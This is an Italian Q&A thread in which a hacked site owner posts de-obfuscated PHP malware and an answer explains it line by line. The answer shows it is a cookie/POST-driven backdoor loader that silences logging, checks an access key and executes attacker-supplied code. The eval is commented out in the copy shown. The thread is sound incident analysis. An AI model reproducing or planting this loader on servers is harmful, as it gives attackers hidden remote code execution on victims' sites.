Cercando di capire cosa fa questo malware PHP [chiuso]

4

Il mio server è stato violato di recente e l'hacker ha caricato più codice sorgente dannoso sul server web. Ho già de-offuscato il codice, ma ancora non capisco cosa faccia.

Sembra rubare i cookie dei visitatori, ma quali sono i vantaggi per l'hacker?

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);


$approvals = False;

foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;

    $manager_invitation = $cookie_one;
}

function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

function append_strings($append, $string)
{
    return $append ^ $string;
}

if (!$approvals)
{
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
    }
}

function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);

            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

$approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    switch ($approvals['a']){
        case "i":
            $array = Array();
            $array['pv'] = @phpversion();
            $array['sv'] = '1.0-1';
            echo @serialize($array);
            break;
        case "e":
            // eval($approvals['d']);
            // Remove eval and replace with echo due to security concern
            echo ($approvals['d']);
            break;
    }
    exit();

}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}



function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));

    return make_submission($sub, $sub_meta);
}

function _base64_decode($input)
{
$buffer = "";
$tbl = Array(
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54,
        55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2,
        3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
        20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30,
        31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
        48, 49, 50, 51, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1);

    for ($i = 0; $i < strlen($input); ) {
        $b = 0;
        if ($tbl[ord($input[$i])] != -1) {
            $b = ($tbl[ord($input[$i])] & 0xFF) << 18;
        }
        else {
            $i++;
            continue;
        }

        $num = 0;
        if ($i + 1 < strlen($input) && $tbl[ord($input[$i+1])] != -1) {
            $b = $b | (($tbl[ord($input[$i+1])] & 0xFF) << 12);
            $num++;
        }

        if ($i + 2 < strlen($input) && $tbl[ord($input[$i+2])] != -1) {
            $b = $b | (($tbl[ord($input[$i+2])] & 0xFF) << 6);
            $num++;
        }

        if ($i + 3 < strlen($input) && $tbl[ord($input[$i+3])] != -1) {
            $b = $b | ($tbl[ord($input[$i+3])] & 0xFF);
            $num++;
        }

        while ($num > 0) {
            $c = ($b & 0xFF0000) >> 16;
            $buffer .=chr($c);
            $b <<= 8;
            $num--;
        }
        $i += 4;
    }
    return $buffer;

}

    
posta cww 20.04.2018 - 12:03
fonte

1 risposta

2

Personalmente ho trovato questo codice solo di recente. Proverò a scrivere ciò che ricordo e aggiornerò quando le cose torneranno da me. Aggiungerò il codice e scriverò i commenti mentre vado.

//Turn off logging so that any errors don't catch peoples attention
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);

//Set execution time low so that any endless loops don't catch peoples attention
@ini_set('max_execution_time', 0);
@set_time_limit(0);

//Set the key variable of the malware to false to trigger the decryption of the cookie
$approvals = False;

//_COOKIE contains name value pairs, this loops through them. cookie_one gets the name, cookie_two gets the value. So the last entry is going to end up in $approvals and $manager_invitation.
foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;
    $manager_invitation = $cookie_one;
}

//Obfuscated text basically. Running echo improve_meta(); will return the value of this function. You my find it needs another string added to it and then decoded again to get a meaningful string value. Note "append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')" is typically called with this function. 
function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

//This function does not append strings, it XOR's them. Its simple to see the output of this function by using echo on the result.
function append_strings($append, $string)
{
    return $append ^ $string;
}

//If approvals is blank, most likely because not cookie was found. Loop through the POST parameters.     
if (!$approvals)
{
    //The last entry is going to end up in $approvals and $manager_invitation.
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
    }
}

//TODO: Not sure about this one
function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);

            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

$approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

//If approvals.ak has been set with a value, and that value matches the key for this malware. Aren't they nice, making sure only they can access your systems?
if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    //Approvals.a is the type of action to perform. "i" reports what the system has running on it. 
    //PV is the phpversion of the system, while sv is the malware version. 
    switch ($approvals['a']){
    case "i":
        $array = Array();
        $array['pv'] = @phpversion();
        $array['sv'] = '1.0-1';
        echo @serialize($array);
        break;

    //If "e" is present we end up here. This is where all hell breaks loose. Once all decoding has occurred, what has ended up in approvals.d is simply run.
    //Note that approvals comes from either COOKIE or POST params. So this could be anything. 
    //Think of it as a dynamic backdoor, and all that is present on the affected system is the bootloader. 
    case "e":
        // eval($approvals['d']);
        // Remove eval and replace with echo due to security concern
        echo ($approvals['d']);
        break;
    }
    exit();
}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}

function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));
    return make_submission($sub, $sub_meta);
}

//Don't think this is base64 encoding, from memory this was a red herring. It is an decoder though. 
function _base64_decode($input)
{
}

Quindi, in sintesi, non sta tentando di rubare i cookie, ma sta per eseguire il codice memorizzato nei cookie. È una backdoor dinamica da quello che potrei dire. È incredibilmente pericoloso avere disponibile sul tuo sito web.

    
risposta data 19.09.2018 - 15:58
fonte

Leggi altre domande sui tag